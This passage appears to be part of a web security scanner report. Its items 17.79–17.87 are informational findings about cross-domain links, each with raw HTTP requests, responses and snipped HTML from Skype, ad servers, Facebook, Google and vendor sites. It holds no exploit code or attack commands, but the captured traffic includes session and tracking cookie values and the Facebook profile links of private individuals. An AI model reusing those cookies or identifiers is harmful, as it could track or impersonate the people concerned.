<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

17.79. https://support.skype.com/search.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /search.do

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search.do?q=xss HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Date: Sun, 04 Sep 2011 21:37:09 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 12385


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

17.80. http://view.atdmt.com/CNT/iview/334305255/direct/01  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://view.atdmt.com
Path:   /CNT/iview/334305255/direct/01

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /CNT/iview/334305255/direct/01?click=http://clk.specificclick.net/click/v=5;m=3;l=19240;c=161441;b=975458;ts=20110904223053;dct=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB3vUzWzRkTubuDYukjQSIn8ytAZ-Y7JoC56mo3jLrwu3UHAAQARgBIAA4AVCAx-HEBGDJ1vqGyKOgGYIBF2NhLXB1Yi0zNDQwODAwMDc2Nzk3OTQ5oAG3oMjrA7IBEXd3dy53M3NjaG9vbHMuY29tugEJNzI4eDkwX2FzyAEJ2gE5aHR0cDovL3d3dy53M3NjaG9vbHMuY29tL2pzL3RyeWl0LmFzcD9maWxlbmFtZT10cnlqc190ZXh0mAKQA8ACBMgClZHuC6gDAegDH-gD3QX1AwAAAEQ%26num%3D1%26sig%3DAOD64_2Uk2nKIPMWkOXJ3LI1O2mvPWJ64A%26client%3Dca-pub-3440800076797949%26adurl%3D HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://afe.specificclick.net/serve/v=5;m=3;l=19240;c=161441;b=975458;ts=20110904223053;pasmc=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB3vUzWzRkTubuDYukjQSIn8ytAZ-Y7JoC56mo3jLrwu3UHAAQARgBIAA4AVCAx-HEBGDJ1vqGyKOgGYIBF2NhLXB1Yi0zNDQwODAwMDc2Nzk3OTQ5oAG3oMjrA7IBEXd3dy53M3NjaG9vbHMuY29tugEJNzI4eDkwX2FzyAEJ2gE5aHR0cDovL3d3dy53M3NjaG9vbHMuY29tL2pzL3RyeWl0LmFzcD9maWxlbmFtZT10cnlqc190ZXh0mAKQA8ACBMgClZHuC6gDAegDH-gD3QX1AwAAAEQ%26num%3D1%26sig%3DAOD64_2Uk2nKIPMWkOXJ3LI1O2mvPWJ64A%26client%3Dca-pub-3440800076797949%26adurl%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23; TOptOut=1

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Mon, 05 Sep 2011 02:30:53 GMT
Connection: close
Content-Length: 8688

<html><head><title>ATT_NoImage_70_Number_728x90</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;marg
...[SNIP]...
<noscript>
<a target="_blank" href="http://clk.specificclick.net/click/v=5;m=3;l=19240;c=161441;b=975458;ts=20110904223053;dct=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB3vUzWzRkTubuDYukjQSIn8ytAZ-Y7JoC56mo3jLrwu3UHAAQARgBIAA4AVCAx-HEBGDJ1vqGyKOgGYIBF2NhLXB1Yi0zNDQwODAwMDc2Nzk3OTQ5oAG3oMjrA7IBEXd3dy53M3NjaG9vbHMuY29tugEJNzI4eDkwX2FzyAEJ2gE5aHR0cDovL3d3dy53M3NjaG9vbHMuY29tL2pzL3RyeWl0LmFzcD9maWxlbmFtZT10cnlqc190ZXh0mAKQA8ACBMgClZHuC6gDAegDH-gD3QX1AwAAAEQ%26num%3D1%26sig%3DAOD64_2Uk2nKIPMWkOXJ3LI1O2mvPWJ64A%26client%3Dca-pub-3440800076797949%26adurl%3Dhttp://clk.atdmt.com/go/334305255/direct;ai.230339600;ct.1/01"><img border="0" src="HTTP://spe.atdmt.com/ds/CJCNTCINGABS/08_04_noimage/ATT_NoImage_70_Number_728x90.jpg?ver=1" width="728" height="90" />
...[SNIP]...

17.81. http://view.atdmt.com/CNT/iview/334305255/direct/01  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://view.atdmt.com
Path:   /CNT/iview/334305255/direct/01

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /CNT/iview/334305255/direct/01?click=http://clk.specificclick.net/click/v=5;m=3;l=19240;c=161441;b=975458;ts=20110904223053;dct=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBmXFbWzRkTvLDM4b6jATmwYzDAp-Y7JoC56mo3jLrwu3UHAAQARgBIAA4AVCAx-HEBGDJ1vqGyKOgGYIBF2NhLXB1Yi0zNDQwODAwMDc2Nzk3OTQ5oAG3oMjrA7IBEXd3dy53M3NjaG9vbHMuY29tugEJNzI4eDkwX2FzyAEJ2gE_aHR0cDovL3d3dy53M3NjaG9vbHMuY29tL2pzL3RyeWl0LmFzcD9maWxlbmFtZT10cnlqc19mb3JtYXR0ZXh0mAKQA8ACBMgClZHuC6gDAfUDAAAARA%26num%3D1%26sig%3DAOD64_2pvgsUrFnwQ-b8TFRVylH69pmqSw%26client%3Dca-pub-3440800076797949%26adurl%3D HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://afe.specificclick.net/serve/v=5;m=3;l=19240;c=161441;b=975458;ts=20110904223053;pasmc=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBmXFbWzRkTvLDM4b6jATmwYzDAp-Y7JoC56mo3jLrwu3UHAAQARgBIAA4AVCAx-HEBGDJ1vqGyKOgGYIBF2NhLXB1Yi0zNDQwODAwMDc2Nzk3OTQ5oAG3oMjrA7IBEXd3dy53M3NjaG9vbHMuY29tugEJNzI4eDkwX2FzyAEJ2gE_aHR0cDovL3d3dy53M3NjaG9vbHMuY29tL2pzL3RyeWl0LmFzcD9maWxlbmFtZT10cnlqc19mb3JtYXR0ZXh0mAKQA8ACBMgClZHuC6gDAfUDAAAARA%26num%3D1%26sig%3DAOD64_2pvgsUrFnwQ-b8TFRVylH69pmqSw%26client%3Dca-pub-3440800076797949%26adurl%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23; TOptOut=1

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Mon, 05 Sep 2011 02:30:56 GMT
Connection: close
Content-Length: 8702

<html><head><title>ATT_Potter_70_Number_728x90</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margi
...[SNIP]...
<noscript>
<a target="_blank" href="http://clk.specificclick.net/click/v=5;m=3;l=19240;c=161441;b=975458;ts=20110904223053;dct=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBmXFbWzRkTvLDM4b6jATmwYzDAp-Y7JoC56mo3jLrwu3UHAAQARgBIAA4AVCAx-HEBGDJ1vqGyKOgGYIBF2NhLXB1Yi0zNDQwODAwMDc2Nzk3OTQ5oAG3oMjrA7IBEXd3dy53M3NjaG9vbHMuY29tugEJNzI4eDkwX2FzyAEJ2gE_aHR0cDovL3d3dy53M3NjaG9vbHMuY29tL2pzL3RyeWl0LmFzcD9maWxlbmFtZT10cnlqc19mb3JtYXR0ZXh0mAKQA8ACBMgClZHuC6gDAfUDAAAARA%26num%3D1%26sig%3DAOD64_2pvgsUrFnwQ-b8TFRVylH69pmqSw%26client%3Dca-pub-3440800076797949%26adurl%3Dhttp://clk.atdmt.com/go/334305255/direct;ai.230339612;ct.1/01"><img border="0" src="HTTP://spe.atdmt.com/ds/CJCNTCINGABS/08_04_Q3_SMB_Update/ATT_Potter_70_Number_728x90.jpg?ver=1" width="728" height="90" />
...[SNIP]...

17.82. http://view.atdmt.com/I36/iview/325171692/direct  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://view.atdmt.com
Path:   /I36/iview/325171692/direct

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /I36/iview/325171692/direct;wi.300;hi.250/01/775562240?click=http://oasc18015.247realmedia.com/RealMedia/ads/click_lx.ads/www.wallstreetoasis.rgm/paid/L28/775562240/Right/RGM/RGM-2618_CapitalOne_300x250_GeoKansas_0828-0917/RGM-2618_CapitalOne_300x250_GeoKansas_0717-0806_070911.html/4d686437616b356934616b41434d6658? HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.wallstreetoasis.com/forums/houlihan-lokey-exit-opps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23; TOptOut=1

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 16:17:02 GMT
Connection: close
Content-Length: 7465

<html><head><title>20110801_CC_Endorser_UT_V2_300_250_FL</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width
...[SNIP]...
<noscript>
<a target="_blank" href="http://oasc18015.247realmedia.com/RealMedia/ads/click_lx.ads/www.wallstreetoasis.rgm/paid/L28/775562240/Right/RGM/RGM-2618_CapitalOne_300x250_GeoKansas_0828-0917/RGM-2618_CapitalOne_300x250_GeoKansas_0717-0806_070911.html/4d686437616b356934616b41434d6658?http://clk.atdmt.com/go/325171692/direct;wi.300;hi.250;ai.232477487;ct.1/01"><img border="0" src="HTTP://spe.atdmt.com/ds/DIII36CAP1CAC/SML_8_18/20110801_CC_Endorser_UT_V2_300_250_FL.gif?ver=1" width="300" height="250" />
...[SNIP]...

17.83. http://www.barracudanetworks.com/ns/products/web-site-firewall-overview.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.barracudanetworks.com
Path:   /ns/products/web-site-firewall-overview.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ns/products/web-site-firewall-overview.php?&a=google-na_WebAppFirewallWW_WebApplicationSecurity&kw=web%20application%20security&gclid=CP2344L_g6sCFUsaQgodmjw72Q HTTP/1.1
Host: www.barracudanetworks.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Houlihan+Lokey#sclient=psy&hl=en&source=hp&q=waf+web+application+security&pbx=1&oq=waf+web+application+security&aq=f&aqi=q-w1&aql=&gs_sm=e&gs_upl=21435l26606l1l26840l27l19l0l6l6l6l1160l12427l5-2.3.8l13l0&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1049&bih=910
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: barra_tracking_code=google-na_WebAppFirewallWW_WebApplicationSecurity; path=/
Set-Cookie: barra_tracking_code_keyword=web+application+security; path=/
Set-Cookie: __debug=TDO; path=/
Set-Cookie: barra_referer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3DHoulihan%2BLokey%23sclient%3Dpsy%26hl%3Den%26source%3Dhp%26q%3Dwaf%2Bweb%2Bapplication%2Bsecurity%26pbx%3D1%26oq%3Dwaf%2Bweb%2Bapplication%2Bsecurity%26aq%3Df%26aqi%3Dq-w1%26aql%3D%26gs_sm%3De%26gs_upl%3D21435l26606l1l26840l27l19l0l6l6l6l1160l12427l5-2.3.8l13l0%26bav%3Don.2%2Cor.r_gc.r_pw.%26fp%3Db7e6040383bebbf%26biw%3D1049%26bih%3D910; path=/
Set-Cookie: barra_hidden_menus=a%3A2%3A%7Bi%3A0%3Bs%3A16%3A%22web_app_firewall%22%3Bi%3A1%3Bs%3A16%3A%22web_app_firewall%22%3B%7D; expires=Tue, 04-Oct-2011 16:18:30 GMT; path=/
Date: Sun, 04 Sep 2011 16:18:29 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
</script>
       <script type="text/javascript" src="http://www.demosondemand.com/shared_components/javascript/launchDemoStage3PlayerClient_js.asp"></script>
...[SNIP]...
<div style="float: right; margin: 0 16px 2px;"><a href="https://login.barracuda.com" style="text-decoration: none;"><img src="/ns/gfx/customer_login.png" name="customer_login" id="customer_login" onmouseover="roll_over('/ns/gfx/customer_login_hover.png','customer_login')" onmouseout="roll_over('/ns/gfx/customer_logi
...[SNIP]...
<img src='../gfx/icons/blog.jpg' align='middle' style='padding-bottom: 5px;'>&nbsp;<a href='http://blog.barracuda.com/pmblog/index.php/category/web-application-firewall/' target='_blank'>View Product Blog</a>
...[SNIP]...
<div id="live-chat-loader" style="display: none">
<script type="text/javascript" src="http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx?div=&zimg=59&lhnid=1288&iv=&custom1=&custom2=&custom3=&t=f"></script>
...[SNIP]...

17.84. http://www.cymphonix.com/2011-shaping-demo-sem.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cymphonix.com
Path:   /2011-shaping-demo-sem.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /2011-shaping-demo-sem.html?utm_campaign=2011-Q1-Web-AdWords&utm_source=AdWords&utm_content=7-Minute-Demo&gclid=CPr6tJD_g6sCFQo0QgodKw5i0g HTTP/1.1
Host: www.cymphonix.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Houlihan+Lokey#sclient=psy&hl=en&source=hp&q=waf+web+application+security&pbx=1&oq=waf+web+application+security&aq=f&aqi=q-w1&aql=&gs_sm=e&gs_upl=21435l26606l1l26840l27l19l0l6l6l6l1160l12427l5-2.3.8l13l0&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1049&bih=910
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:19:07 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.3 OpenSSL/0.9.8g mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.6-1+lenny9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 14014

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
<!-- Start Demos on Demand code -->
<script type="text/javascript" src="http://www.demosondemand.com/shared_components/javascript/launchDemoStage3PlayerClient_js.asp"></script>
...[SNIP]...
<!-- Google Site Search -->
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
<div class="social-media-container">
<a href="http://twitter.com/cymphonix"><img src="/images/twitter_32.png" id="twitimg" alt="Follow us on Twitter" /></a>
<a href="http://www.facebook.com/pages/Cymphonix/121850684519843?ref=ts"><img src="/images/facebook_32.png" id="fbimg" alt="Follow us on Facebook" /></a>
<a href="http://www.linkedin.com/companies/cymphonix"><img src="http://static.linkedin.com/scds/common/u/img/webpromo/btn_cofollow_badge.png" style="padding-bottom: 4px;" alt="Cymphonix on LinkedIn"></a>
...[SNIP]...
</script>
<script type="text/javascript" src="https://lct.salesforce.com/sfga.js"></script>
...[SNIP]...
<!-- End of HubSpot Logging Code -->


<script type="text/javascript" language="JavaScript"
src="http://dce.sapha.com/engine.php?ac=2522">
</script>
<noscript><a href="http://www.sapha.com"><img
src="http://dce.sapha.com/logging.php?ac=2522&ns=1" border="0" alt="Sapha Web
Traffic Conversion Tools and Analytics">
</a>
...[SNIP]...

17.85. http://www.facebook.com/plugins/fan.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/fan.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/fan.php?api_key=67fc5e01d68cf35eba52297f5bf2ed3d&connections=10&height=250&id=8304333127&locale=en_US&sdk=joey&stream=false&width=377 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424053111904900904576549933849920392.html?mod=googlenews_wsj
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.52.48
X-Cnection: close
Date: Sun, 04 Sep 2011 16:17:47 GMT
Content-Length: 11138

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Fan</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/0V1g9eV4kVC.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/HR2ezcCYeTR.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/xxErGdwd-7F.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/te2emPSgfVn.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yq/r/346Pl_u5ziA.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yn/r/fXOlnGV2onC.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/vneZ6lOGBMV.js"></script>
...[SNIP]...
<a href="http://www.facebook.com/wsj" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/276407_8304333127_804440_q.jpg" alt="The Wall Street Journal" /></a>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/teganrf" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/276259_100001224676497_7675063_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/lldclldc" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274311_671208966_7146223_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1100206060" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275924_1100206060_1434539_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/hen.dror" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/260937_530685382_1860778_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=210002288" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/174063_210002288_8093714_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=834709440" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274806_834709440_5146084_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-ash2/203173_100000577778505_3322651_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/pankajshuklaind" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/70681_100000600221118_7122867_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/balasaheb.nimbalkar" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275611_100002366358874_798295_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1611563860" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/276229_1611563860_7978056_q.jpg" alt="" /><div class="name">
...[SNIP]...

17.86. http://www.google.com/cse  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /cse

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /cse?cx=016181047177182094804%3A7qjk2nlyciq&ie=UTF-8&q=xss HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.cymphonix.com/2011-shaping-demo-sem.html?utm_campaign=2011-Q1-Web-AdWords&utm_source=AdWords&utm_content=7-Minute-Demo&gclid=CPr6tJD_g6sCFQo0QgodKw5i0g
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=PLdCnMVP32Eq-aixxa5G1TBAISiRhCLS_FeQK0IhC5RmmIucxaAKox8g-5gdMc5axlq2f-p-_HJ2SXeA5BrEyahK9Sydv3VKM7AMsPdXWC8EarUF9azn6VC-tcSGO5ST

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 04 Sep 2011 16:20:49 GMT
Server: qfe
Cache-Control: private
Content-Length: 5549
X-XSS-Protection: 1; mode=block


<!DOCTYPE html>
<html dir="ltr">
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
<title>Google Custom Search</title>
<script type="text/javascript" src="http://www.google
...[SNIP]...
<div id="cse-header">
<a id="cse-logo-target" href="http://www.cymphonix.com">
<img id="cse-logo" src="http://www.cymphonix.com/images/cymx_logo_sm.png" height="31" />
</a>
...[SNIP]...

17.87. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?sourceid=chrome&ie=UTF-8&q=Houlihan+Lokey HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=XU0IQAZklWhyhWdlymBvdCxVkSIFK9aUlYUQMFi34UxO1ecYTEfO4ZrKByNclFfOyvF5AaGDzivPGm42OGxJA3ND_Gd1jskTnbkzYzvsb4F6P5IHltVNnazrs6Pi8hSq

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:16:40 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Get-Dictionary: /sdch/StnTz5pY.dct
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 108620

<!doctype html> <head> <title>Houlihan Lokey - Google Search</title> <script>window.google={kEI:"aKRjTu6jFOLliAKk4qChCg",getEI:function(a){var b;while(a&&!(a.getAttribute&&(b=a.getAttribute("ei
...[SNIP]...
<li class=gbmtc><a onclick=gbar.qs(this) class=gbmt id=gb_36 href="http://www.youtube.com/results?q=Houlihan+Lokey&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick="gbar.logger.il(1,{t:36})">YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.hl.com/" class=l onmousedown="return clk(this,this.href,'','','','1','','0CCQQFjAA')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:890k9DYjcqkJ:www.hl.com/+Houlihan+Lokey&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','1','','0CCYQIDAA')">Cached</a>
...[SNIP]...
<h3 class=r style="display:inline"><a href="http://www.hl.com/us/careers.aspx" class=l onmousedown="return clk(this,this.href,'','','','2','','0CC0QjBAwAQ')">Careers</a>
...[SNIP]...
<h3 class=r style="display:inline"><a href="http://www.hl.com/us/officelocations.aspx" class=l onmousedown="return clk(this,this.href,'','','','3','','0CDIQjBAwAg')">Office Locations</a>
...[SNIP]...
<h3 class=r style="display:inline"><a href="http://www.hl.com/us/teammembers.aspx" class=l onmousedown="return clk(this,this.href,'','','','4','','0CDcQjBAwAw')">Contact Us</a>
...[SNIP]...
<h3 class=r style="display:inline"><a href="http://www.hl.com/us/aboutus.aspx" class=l onmousedown="return clk(this,this.href,'','','','5','','0CDwQjBAwBA')">About Us</a>
...[SNIP]...
<h3 class=r style="display:inline"><a href="http://www.hl.com/us/experiencerecruitment.aspx" class=l onmousedown="return clk(this,this.href,'','','','6','','0CEEQjBAwBQ')">Experienced Recruiting</a>
...[SNIP]...
<h3 class=r style="display:inline"><a href="http://hl.com/conference/tmt2010/webcast/" class=l onmousedown="return clk(this,this.href,'','','','7','','0CEYQjBAwBg')">Webcast</a>
...[SNIP]...
